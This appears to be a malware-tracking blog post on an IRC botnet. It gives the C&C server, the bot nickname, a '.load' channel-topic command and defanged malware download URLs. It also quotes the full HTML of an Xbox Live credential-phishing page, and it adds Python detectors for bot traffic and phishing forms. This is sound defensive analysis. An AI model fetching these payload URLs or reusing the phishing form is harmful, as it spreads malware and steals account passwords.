digested.maneradio.net (IRC botnet hosted in Germany, Karlsruhe, 1&1 Internet AG)

Resolved: [digested.maneradio.net] to [82.165.156.127]

Download URLs
hxxp://107.20.142.191/u/108730327/c.exe (dl.dropbox.com) 

hxxp://74.208.112.117:6/.x/heroi.exe

C&C Server: 82.165.156.127:1866

Server Password:

Username: hh
Nickname: n[DEU|XP|DELL-D3E62F7E26]vddowpy
Channel: #!h! (Password: )
Channeltopic: :.load /99/106/112/81/55/59/40/110/116/35/105/120/111/108/117/108/110/38/127/122/100/56/126/9/18/40/39/45/57/39/42/56/55/44/98/14/100/123/108/
Topic by: [ tx ]
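As an added example (not part of the original post), here is a small Python scanner for IRC traffic that flags the two signals visible in the capture above: a fingerprint-style nickname of the form n[DEU|XP|DELL-...]xxxxx, and a channel topic that is a dot-command followed by a slash-separated numeric payload (.load /99/106/...). The sample lines are constructed to mirror the fields above and are not a real capture; the regexes and the payload extraction are my assumptions. The post does not say how the numeric payload encodes the command, so the values are only extracted and counted, not decoded.

```python
import re
from dataclasses import dataclass

# Constructed sample IRC client/server lines modelled on the fields in the write-up
# (username hh, nickname n[DEU|XP|DELL-D3E62F7E26]vddowpy, channel #!h!, ".load" topic).
# Not a real capture; the benign lines show that the rules do not fire on normal traffic.
SAMPLE_IRC_LINES = [
    "NICK n[DEU|XP|DELL-D3E62F7E26]vddowpy",
    "USER hh 0 * :hh",
    "JOIN #!h!",
    ":irc.example 332 n[DEU|XP|DELL-D3E62F7E26]vddowpy #!h! :.load /99/106/112/81/55/59/40/110/116/35/105/120/111/108/117/108/110/38/127/122/100/56/126/9/18/40/39/45/57/39/42/56/55/44/98/14/100/123/108/",
    "NICK alice_42",
    "JOIN #linux",
    ":irc.example 332 alice_42 #linux :Welcome, read the FAQ before asking",
]

# Heuristics (assumptions, not rules stated in the post):
# - a nick of the form <letter>[CC|OS|HOSTNAME]<random>, i.e. a host fingerprint
#   the bot embeds so the operator can tell victims apart
# - a channel topic that is a dot-command followed by a /-separated numeric payload
BOT_NICK_RE = re.compile(r"^[A-Za-z]?\[[A-Z]{2,3}\|[^\]|]+\|[^\]]+\][A-Za-z0-9]{4,}$")
TOPIC_CMD_RE = re.compile(r"^\.([A-Za-z]+)\s+((?:/\d+)+/?)\s*$")


@dataclass
class Finding:
    line_no: int
    kind: str
    detail: str


def parse_irc_line(line):
    """Split one IRC line into (prefix, command, middle params, trailing param)."""
    rest = line.rstrip("\r\n")
    prefix = None
    if rest.startswith(":"):
        prefix, _, rest = rest[1:].partition(" ")
    trailing = None
    if " :" in rest:
        rest, _, trailing = rest.partition(" :")
    parts = rest.split()
    command = parts[0].upper() if parts else ""
    return prefix, command, parts[1:], trailing


def topic_payload(topic):
    """Return the numeric values of a dot-command topic, or None if it is not one.
    The post does not give the encoding of the values, so they are only extracted."""
    m = TOPIC_CMD_RE.match(topic)
    if not m:
        return None
    return [int(v) for v in m.group(2).strip("/").split("/")]


def scan_irc_lines(lines):
    """Run both heuristics over a list of IRC lines and return the findings in order."""
    findings = []
    for n, line in enumerate(lines, 1):
        _, cmd, params, trailing = parse_irc_line(line)
        if cmd == "NICK" and params and BOT_NICK_RE.match(params[0]):
            findings.append(Finding(n, "bot-style nick", params[0]))
        # the topic arrives as RPL_TOPIC (332) on join or as a TOPIC command later
        if cmd in ("332", "TOPIC") and trailing is not None:
            values = topic_payload(trailing)
            if values is not None:
                channel = params[-1] if params else "?"
                cmd_name = TOPIC_CMD_RE.match(trailing).group(1)
                findings.append(Finding(n, "command-in-topic",
                                        f"{channel} .{cmd_name} with {len(values)} values"))
    return findings


if __name__ == "__main__":
    for f in scan_irc_lines(SAMPLE_IRC_LINES):
        print(f"line {f.line_no}: {f.kind}: {f.detail}")
```

Both rules are cheap enough to run over a proxy or IDS reassembled IRC stream; the nick rule on its own is a strong indicator because legitimate clients do not embed country, OS and hostname in the nickname, while the topic rule catches the channel-topic-as-command pattern regardless of which nick the bot picks.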

UPDATE:
Concerning a post from an anonymous commenter: I am adding it here, with modifications to prevent accidental infections.

"Here is a Smoke bin, I believe with a rootkit in it: hxxps://dl.dropbox.com/u/104452013/chainzaio.exe, and here is a Java drive-by with either Athena, Insomnia or Andromeda: hxxp://freeunlimitedxboxcodes.tk. Have fun lol."

Here is more about the .tk drive-by:

index.html:

<html>
  <head>
    <title>sean</title>
    <meta name="description" content="sean">
    <meta name="keywords" content="background,message,commons">
    <script type="text/javascript">
        var _gaq = _gaq || [];
        _gaq.push(['_setAccount', 'UA-23441223-3']);
        _gaq.push(['_setDomainName', 'none']);
        _gaq.push(['_setAllowLinker', true]);
        _gaq.push(['_trackPageview']);
        (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
            ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
            var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
        })();
    </script>
  </head>
  <frameset rows="*" framespacing="0" border="0" frameborder="NO">
    <frame src="http://xboxcodesexploiter.yolasite.com/" name="dot_tk_frame_content" scrolling="auto" noresize>
  </frameset>
  <noframes>
    <body>
    </body>
  </noframes>
</html>

Here is the redirect target, the page loaded inside the frame:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--
Design by Free CSS Templates
http://www.freecsstemplates.org
Released for free under a Creative Commons Attribution 2.5 License

Name       : FronzenAge
Description: A two-column, fixed-width template suitable for business sites and blogs.
Version    : 1.0
Released   : 20071108

-->
<html xmlns="http://www.w3.org/1999/xhtml">
    <head>
        
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>sean</title>
<meta name="description" content="" />
<meta name="keywords" content="" />
<style type="text/css">
/*
Design by Free CSS Templates
http://www.freecsstemplates.org
Released for free under a Creative Commons Attribution 2.5 License
*/

* {
    margin: 0;
    padding: 0;
}

body {
    background: #FFFFFF url(templates/FrozenAge2/resources/common/images/img01.gif) repeat-x;
    font-family: "Trebuchet MS", Arial, Helvetica, sans-serif;
    font-size: 13px;
    color: #6E6E6E;
}

#sys_banner{
    width:960px;
    margin-left:auto; margin-right:auto;
}

/* Logo */

#logo {
    width: 870px;
    height: 135px;
    margin: 0 auto;
}

#logo h1, #logo h2 {
    margin: 0;
    color:#242c36;
}

#logo h1 a{
    color:#242c36;
}

#logo h1 {
    float: left;
    padding-top: 75px;
}

#logo h2 {
    float: right;
    padding-top: 95px;
    font-size: 16px;
    font-weight: normal;
}

#logo h2, #logo h2 a {
    color: #939292;
}

#logo a {
    text-decoration: none;
}

/* Menu */

#menu {
    width: 960px;
    height: 62px;
    margin: 0 auto;
    background: #252E3A url(templates/FrozenAge2/resources/common/images/img02.jpg) no-repeat;
}

#menu ul {
    margin: 0;
    padding: 21px 0 0 30px;
    list-style: none;
    line-height: normal;
}

#menu li {
    float: left;
    padding: 0 20px 0 22px;
    background: url(templates/FrozenAge2/resources/common/images/img03.gif) no-repeat left center;
}

#menu li.first {
    background: none;
}

#menu a {
    text-decoration: none;
    font-size: 14px;
    font-weight: bold;
    color: #FFFFFF;
}

/* Page */

#content {
    width: 900px;
    margin: 0 auto;
    padding: 45px 35px 45px 25px;
    background: url(templates/FrozenAge2/resources/common/images/img05.gif) no-repeat;
}

/* Content */

/*
#content {
    float: left;
    width: 603px;
}
*/


/* Footer */

.sys_footer {
    clear: both;
    width: 870px;
    height: 40px;
    margin: 0 auto;
    padding: 35px 45px 0px 45px;
    background: url(templates/FrozenAge2/resources/common/images/img05.gif) no-repeat;
    text-align:center;
}

#sys_designerfooter {
    border: none;
    margin:0 auto;
    padding: 0;
    background: none;
    position:relative;
    top:-60px;
}

.sys_footer p {
    margin: 0;
    line-height: normal;
    color: #B4B4B4;
}

.sys_footer a {
    color: #B4B4B4;
}

.sys_footer .legal {
    float: left;
}

.sys_footer .credit {
    float: right;
}
            
.sys_txt{
    margin: 0;
    padding: 0;
    font-family: "Trebuchet MS", Arial, Helvetica, sans-serif;
    font-size: 13px;
    color: #6E6E6E;
}

a{color:#346086;}

.sys_txt a img{

    border : none;

}
.sys_txt a{
    
    color: #346086;

}


.sys_txt a:hover{

    text-decoration: none;

}


.sys_txt h1, 
.sys_txt h2, 
.sys_txt h3, 
.sys_txt h4,
.sys_txt h5,
.sys_txt h6,
.sys_txt p{ 
    
    font-weight: normal;
    
}

.sys_txt h1{
    
    font-size          : 2em;
    color            : #242c36;    
    letter-spacing    : -2px;
}

.sys_txt h2{
    
    font-size        : 1.6em;
    color            : #242c36; 
    padding            : 10px 0 10px 0;
    letter-spacing    : -1px;

}

.sys_txt h3{
    
    font-size        : 1em;
    color            : #242c36; 
    padding            : 10px 0 10px 0;
}

.sys_txt h4{
    
    font-size          : 1em;
    color            : #242c36; 
    padding            : 10px 0 10px 0;
}

.sys_txt h5{
    
    font-size    : 1em;
    color        : #242c36; 
    padding        : 10px 0 10px 0;
}

.sys_txt h6{
    
    font-size    : 1em;
    color        : #242c36; 
    padding        : 10px 0 10px 0;
}

.sys_txt p, 
.sys_txt blockquote, 
.sys_txt ul,
.sys_txt ol {
    margin-bottom: 1.5em;
    line-height: 1.8em;
    padding-left :1em;
}

 
.sys_txt p{
        
    margin:0;
    padding:10px 0;
    
}

.sys_txt blockquote {
    
    font-style        : italic;
    border-style    : none;
    margin-left        : 2em;
    margin:0;
    padding:10px 30px;
    
}

.sys_txt ul,
.sys_txt ol{
    font-family:Tahoma,Arial,Helvetica,sans-serif;
    font-size:small;
    font-size-adjust:none;
    font-style:normal;
    font-variant:normal;
    font-weight:normal;
    line-height:normal;
    margin-left: 5em;
}    
            
.sys_txt ul{

    margin:0;
    padding:10px 50px;    
    list-style: square;

}

.sys_txt ol{
    margin:0;
    padding:10px 50px;    list-style: lower-roman;
}

.sys_txt ul li{

    
}


</style>
<link rel="stylesheet" type="text/css" href="classes/components/Form/layouts/Default/Default.css" /><script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js"></script><script type="text/javascript">window.jQuery || document.write('<script src="classes/commons/jquery/jquery-1.7.1.min.js"></script>')</script>
    </head>

    <body id="sys_background">
        <div id="logo">
            <h1 class="empty" style="text-align:left;"><a id="sys_heading" href="./" style="color:#242c36;font-size:26px;font-style:normal;font-weight:bold;text-decoration:none;"></a></h1>
        </div>
        <div id="menu">
            <ul class='sys_navigation'>
                <li class="first"><a href="./" title="Home">Home</a></li>
                <li><a href="proof.php" title="Proof">Proof</a></li>
                <li><a href="about.php" title="About">About</a></li>
            </ul>
        </div>
        
        <div id="splash">
            <div id="sys_banner" name="banner" style="height:147px;width:960px; background: url(resources/coollogo_com-12935788.png.cropped960x147o0%2C16s886x102.png) no-repeat;">
            &nbsp;

            </div>
        </div>
        <!-- start page -->
        <div id="content">
            <div style="width: 100%; padding: 0px; margin: 0px" class="layout_1-column">
    <div id="layout_row1">
                    <div id="sys_region_1" style="margin:0px; padding:5px; vertical-align:top; line-height:normal; min-width:100px" class="zone_top" ><div id="I17" style="display:block;clear: both;text-align:center;margin:10px 10px 10px 10px;" class="Social_LikeStrip_Default"><div>
    <table cellpadding='0' cellspacing='0' style='width:100%;'>
        <tr>
                            <td style='width:50%;'></td>
                            
                <td>
                                        
                        <table cellpadding='0' cellspacing='0'>
                            <tr>
                                <td style='vertical-align:bottom;'>
                                
                                    <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
                                    <a href="http://twitter.com/share" class="twitter-share-button" data-lang="en" data-count="none">Tweet</a>    
                                
                                </td>
                                <td style='vertical-align:bottom;'>
                                
                                    <div style='padding:0 5px;'>
                                        <iframe src="http://www.facebook.com/plugins/like.php?send=false&amp;href=http%3A%2F%2Fxboxcodesexploiter.yolasite.com%2F&amp;layout=button_count&amp;show_faces=false&amp;action=like&amp;width=49&amp;height=20&amp;locale=en_US" scrolling="no" frameborder="0" style="border:none;overflow:hidden;width:49px;height:20px;" allowTransparency="true"></iframe>         
                                    </div>
                            
                                </td>
                                <td style='vertical-align:bottom;'>
                            
                                    <script type="text/javascript" src="https://apis.google.com/js/plusone.js">
                                      {lang: 'en-US'}
                                    </script>
                                    <g:plusone size="medium" count="false"></g:plusone>
                                    <script type="text/javascript">gapi.plusone.go();</script>
                            
                                </td>
                            </tr>
                        </table>
                        
                                        
                </td>
                
                            <td style='width:50%;'></td>
                    </tr>
    </table>
</div></div><div id="I21" style="display:block;clear: both;text-align:center;" class="GoogleAdSense_Default"></div><div id="I22" style="display:block;clear: both;margin:10px 10px 10px 10px;" class="Horizontal_Line_Default">    <div style='border-bottom-width:1px;border-bottom-style:solid;border-bottom-color:#cccccc;font-size:0;padding:0;margin:0;height:0;line-height:0;'></div>
</div><div id="I16" style="display:block;clear: both;" class="Form_Default"><div class="sys_yola_form">
        <form method='post' action='http://forms.yola.com/formservice/en/c3f8653cf6bc4b77b3fb6becfe738162/8a49866b3a06a8b4013a0a4a083253c9/8a49866b3a06a8b4013a0a4a084d53ca/I16/'>
            <div class='yola-form-field'>
                <p class='label'><label for='yola_form_widget_I16_0'>Windows live id</label></p>
                <input id='yola_form_widget_I16_0' class='text' name='0<text>' type='text' value='' />
                <input type='hidden' name='0<label>' value='Windows live id' />
            </div>
            <div class='yola-form-field'>
                <p class='label'><label for='yola_form_widget_I16_1'>Account password</label></p>
                <input id='yola_form_widget_I16_1' class='text' name='1<text>' type='text' value='' />
                <input type='hidden' name='1<label>' value='Account password' />
            </div>
            <div class='yola-form-field'>
                <p class='label'><label for='yola_form_widget_I16_2'>What you wan't</label></p>
                <select id='yola_form_widget_I16_2' name='2<list>'>
                    <option value='48 hour trial'>48 hour trial</option><br />
                    <option value='1 month xbox gold'>1 month xbox gold</option><br />
                    <option value='3 months of xbox gold'>3 months of xbox gold</option><br />
                    <option value='12 months of xbox gold'>12 months of xbox gold</option><br />
                    <option value='160 Microsoft points'>160 Microsoft points</option><br />
                    <option value='1600 Microsoft points'>1600 Microsoft points</option><br />
                    <option value='4000 Microsoft points'>4000 Microsoft points</option><br />
                </select>
                <input type='hidden' name='2<label>' value='What you wan&#039;t' />
            </div>
            <input type='hidden' name='redirect' value='http://xboxcodesexploiter.yolasite.com/?formI16Posted=true' />
            <input type='hidden' name='redirect_fail' value='http://xboxcodesexploiter.yolasite.com/?formI16PostFailed=true' />
            <input type='hidden' name='form_name' value='' />
            <input type='hidden' name='site_name' value='sean' />
            <input type='hidden' name='destination' value='1Qh4a682H62S1P4Tycj48xLmobIkzlipU1o=:RtGwf7dhwaQhbXMBthrD38eWKotEi_igFka46FSurbo=' />
            <p><input class='submit' type="submit" value="Exploit" /></p>
        </form>
</div></div></div>
            </div>
</div>
        </div>
        <!-- end page -->
        <div id='sys_footer' class='sys_footer'></div>
    
<style type="text/css">
    #sys_yolacredit_wrap{text-align:center;}
    #sys_yolacredit{text-align:center;line-height:1.2em;margin:1em auto;font-family:Arial;position:relative;background:#fff url(classes/commons/yola_footer/png/sprites.png) top right no-repeat;border-top:1px solid #e1e1e1;border-bottom:1px solid #e1e1e1;padding:13px 73px 15px 17px;color:#222;font-size:18px;display:inline-block;}
    #sys_yolacredit p{margin:0;padding:0;line-height:1.2em;}
    #sys_yolacredit p a{color:#222;text-decoration:none;}
    #sys_yolacredit p a:hover{text-decoration:underline;}
    #sys_yolacredit_message{display:none;color:red;padding:20px 20px 20px 110px;background:url(classes/commons/yola_footer/png/sprites.png) 20px center no-repeat;position:absolute;top:0;right:0;z-index:1;}
    #sys_yolacredit_message_wrap{display:none;position:absolute;top:0;right:0;padding-bottom:25px;background:url(classes/commons/yola_footer/png/sprites.png) bottom left no-repeat;}
    #sys_yolacredit_message_wrap_inner{font-size:13px;opacity:.8;filter: alpha(opacity = 80);background:#797979;-moz-border-radius:8px;-khtml-border-radius:8px;-webkit-border-radius:8px;border-radius:8px;}
    #sys_yolacredit_message p{width:260px;padding:5px 0;margin:0;text-align:left;color:#fff;font-size:13px;background:transparent;position:relative;}
    #sys_yolacredit a.yola{font-size:0;position:absolute;top:5px;right:0;display:inline-block;width:65px;height:37px;float:right;text-decoration:none;color:"#fff";}
    #sys_yolacredit a.yola:hover;{text-decoration:none;}
    #sys_yolacredit a.yola span{display:none;}
</style>
<!--[if lte IE 6]>
    <style type="text/css">
        #sys_yolacredit{background:#fff url(classes/commons/yola_footer/gif/sprites.gif) top right no-repeat;}
        #sys_yolacredit_message{background:url(classes/commons/yola_footer/gif/sprites.gif) 20px center no-repeat;}
        #sys_yolacredit_message_wrap{background:url(classes/commons/yola_footer/gif/sprites.gif) bottom left no-repeat;}
        #sys_yolacredit_message_wrap_inner{filter: alpha(opacity = 100);}
    </style>
<![endif]-->
<div id="sys_yolacredit_wrap">
        <span id="sys_yolacredit" style="" title="Visit Yola.com to create your own free website">
        <div id="sys_yolacredit_message">
            <p>This free website was made using Yola.</p>
            <p>No HTML skills required. Build your website in minutes.</p>
            <p>Go to www.yola.com and sign up today!</p>
        </div>
        <div id="sys_yolacredit_message_wrap">
            <div id="sys_yolacredit_message_wrap_inner"></div>
        </div>
        <p>Make a <a href="http://www.yola.com/">free website</a> with <a class="yola" href="http://www.yola.com/"><span>Yola</span></a></p>
    </span>
</div>
<script type="text/javascript">
    document.getElementById("sys_yolacredit").onmouseover = function(){
        var m = document.getElementById("sys_yolacredit_message"),
        w = document.getElementById("sys_yolacredit_message_wrap"),
        n = document.getElementById("sys_yolacredit_message_wrap_inner");
        m.style.display = "block";
        w.style.display = "block";
        m.style.top = (m.offsetHeight * -1 - 15) + "px";
        w.style.top = m.style.top;
        m.style.right = (m.offsetWidth * -1 + 78) + "px";
        w.style.right = m.style.right;
        n.style.width = m.offsetWidth + "px";
        n.style.height = m.offsetHeight + "px";
    };
    document.getElementById("sys_yolacredit").onmouseout = function(){
        document.getElementById("sys_yolacredit_message").style.display = "none";
        document.getElementById("sys_yolacredit_message_wrap").style.display = "none";
    };
</script>

<script type="text/javascript">
            var _yts = _yts || [];
            _yts.push(["_siteId", "8a49866b3a06a8b4013a0a4a083253c9"]);
            _yts.push(["_trackPageview"]);
            (function() {
                var yts = document.createElement("script");
                yts.type = "text/javascript";
                yts.async = true;
                yts.src = "http://analytics.yola.net/tracking.js";
                (document.getElementsByTagName("head")[0] || document.getElementsByTagName("body")[0]).appendChild(yts);
            })();        
        </script><!-- Start Quantcast tag -->
    <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
    <script type="text/javascript">_qacct="p-b8x17GqsQ_656";quantserve();</script>
    <noscript>
        <a href="http://www.quantcast.com/p-b8x17GqsQ_656" target="_blank"><img src="http://pixel.quantserve.com/pixel/p-b8x17GqsQ_656.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/></a>
    </noscript>
    <!-- End Quantcast tag --></body>

</html>
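The two captured pages above carry the signals that mark this as a credential-harvesting page rather than an exploit kit: the .tk index is a bare frameset pulling content from a different host, and the Yola page posts a form labelled "Windows live id" / "Account password" (both plain text inputs) to a third-party form service. As an added example, not part of the original post, here is a Python checker that parses such pages with the standard-library HTML parser and reports those signals. The sample HTML is a trimmed reconstruction of the captured pages; the form-service ID is replaced by a placeholder and the field ids and names are simplified, so they are constructed values, not the page's own.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Trimmed reconstructions of the two captured pages (constructed for this example:
# form-service ID replaced by a placeholder, field ids/names simplified).
SAMPLE_FRAMESET = """<html><head><title>sean</title></head>
<frameset rows="*" framespacing="0" border="0" frameborder="NO">
  <frame src="http://xboxcodesexploiter.yolasite.com/" name="dot_tk_frame_content" scrolling="auto" noresize>
</frameset></html>"""

SAMPLE_FORM_PAGE = """<html><body>
<form method='post' action='http://forms.yola.com/formservice/en/FORM-ID-PLACEHOLDER/'>
  <p class='label'><label for='f0'>Windows live id</label></p>
  <input id='f0' class='text' name='field0' type='text' value='' />
  <p class='label'><label for='f1'>Account password</label></p>
  <input id='f1' class='text' name='field1' type='text' value='' />
  <input type='hidden' name='redirect' value='http://xboxcodesexploiter.yolasite.com/?formI16Posted=true' />
  <p><input class='submit' type="submit" value="Exploit" /></p>
</form></body></html>"""

# A harmless search form, to show the checker stays quiet on ordinary pages
SAMPLE_BENIGN = """<html><body><form action="/search">
<label for="q">Search</label><input id="q" name="q" type="text"></form></body></html>"""

# Words in a label or field name that indicate an account credential is being asked for
CRED_WORDS = ("password", "passwd", "live id", "login", "username", "email", "e-mail")


class FormAudit(HTMLParser):
    """Collect frames, form actions, labels and inputs from one HTML document."""

    def __init__(self):
        super().__init__()
        self.frames = []    # src of every <frame>/<iframe>
        self.forms = []     # action of every <form>
        self.labels = {}    # input id -> label text
        self.inputs = []    # (id, name, type) of every <input>
        self._label_for = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag in ("frame", "iframe") and a.get("src"):
            self.frames.append(a["src"])
        elif tag == "form":
            self.forms.append(a.get("action") or "")
        elif tag == "label":
            self._label_for = a.get("for")
        elif tag == "input":
            self.inputs.append((a.get("id"), a.get("name") or "", (a.get("type") or "text").lower()))

    def handle_endtag(self, tag):
        if tag == "label":
            self._label_for = None

    def handle_data(self, data):
        if self._label_for:
            self.labels[self._label_for] = self.labels.get(self._label_for, "") + data.strip()


def assess_page(html_text, page_host):
    """Return the credential-harvesting signals found in html_text served from page_host."""
    p = FormAudit()
    p.feed(html_text)
    findings = []
    for src in p.frames:
        host = urlparse(src).hostname
        if host and host != page_host:
            findings.append(f"frame loads content from another host: {host}")
    for action in p.forms:
        host = urlparse(action).hostname
        if host and host != page_host:
            findings.append(f"form posts to a third-party host: {host}")
    for fid, name, itype in p.inputs:
        if itype in ("hidden", "submit", "button"):
            continue
        label = p.labels.get(fid, "")
        text = f"{label} {name}".lower()
        if any(w in text for w in CRED_WORDS):
            note = " (plain type=text, not type=password)" if "password" in text and itype == "text" else ""
            findings.append(f"credential field '{label or name}' type={itype}{note}")
    return findings


if __name__ == "__main__":
    for host, doc in (("freeunlimitedxboxcodes.tk", SAMPLE_FRAMESET),
                      ("xboxcodesexploiter.yolasite.com", SAMPLE_FORM_PAGE)):
        print(host, assess_page(doc, host))
```

The host comparison is deliberately exact: a phishing page that frames or posts to a host outside its own domain is the common case, and a page asking for a Microsoft account password while posting to a generic form service is what the Yola page above does. Any one of the three findings would merit a closer look; all three together are enough to block the domain and pull the form-service endpoint for takedown.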

Hosting info:
http://whois.domaintools.com/82.165.156.127


1 Comment

I_Post_Ur_Info - September 28, 2012 at 11:56 pm

Eh, the file is just a stealer, probably ISR, in a password-protected 7zip file inside of a self-extracting 7zip archive. Panel is here: smokeindrostealer.binhoster.com
JDB is just an Xbox Live account phish.
